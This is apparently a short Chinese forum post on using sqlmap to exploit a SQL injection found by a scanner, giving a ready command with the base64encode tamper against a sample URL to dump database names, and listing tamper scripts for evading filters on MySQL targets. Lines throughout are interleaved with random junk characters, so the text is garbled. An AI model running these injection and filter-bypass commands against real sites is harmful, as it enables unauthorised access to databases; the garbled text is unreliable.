WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
& V( F9 \9 g6 ^% Q' j$ V. [& _6 b) r) S0 w/ }
sqlmap的tamper里有个base64encode.py2 {2 z" ^6 u1 P4 B+ ~1 |
0 Z, } u1 d: ?0 H* i- e5 ]6 _
使用如下
& y) Z) G. q4 L5 X: N7 x/ S: s$ [' j0 ?. o$ m( E; \
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
7 q" S( F* \' h
) T" ^) L+ |2 r, D3 z. B$ s. a, c5 E" F" n" L
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
+ \0 F: W- g5 e8 G7 ?* W% n8 l! H+ E1 E
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
' o& I% a' E$ x
$ k0 E- o8 l& T. y4 Jspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入
3 h4 H4 A! L- Nspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入! N2 x+ H. H% `1 M
首先确定目标数据库版本,然后选择相应的脚本。
, T" m M& X6 l2 n& {-v 3 --batch --tamper "space2hash.py"3 S4 l1 D V' ]' ]& B# S& M
3 ]* n9 s* v+ H9 W. A' l还有其他一些插件:
1 ^9 M, g' M: n8 E. E& {encodes编码 ——charencode.py
: f' q% {$ d; q {base64编码 —— base64encode.py
2 y3 K$ _5 \. C替换空格和关键字 —— halfversionedmorekeywords.py
; q( |1 V6 t: @# e& L/ b- k0 q |
! E }5 ?# @) `) {8 A6 W/ D" P# ]4 o
6 d5 L9 a2 N6 l) I, b6 I3 N
/ D0 }) S& }1 o
|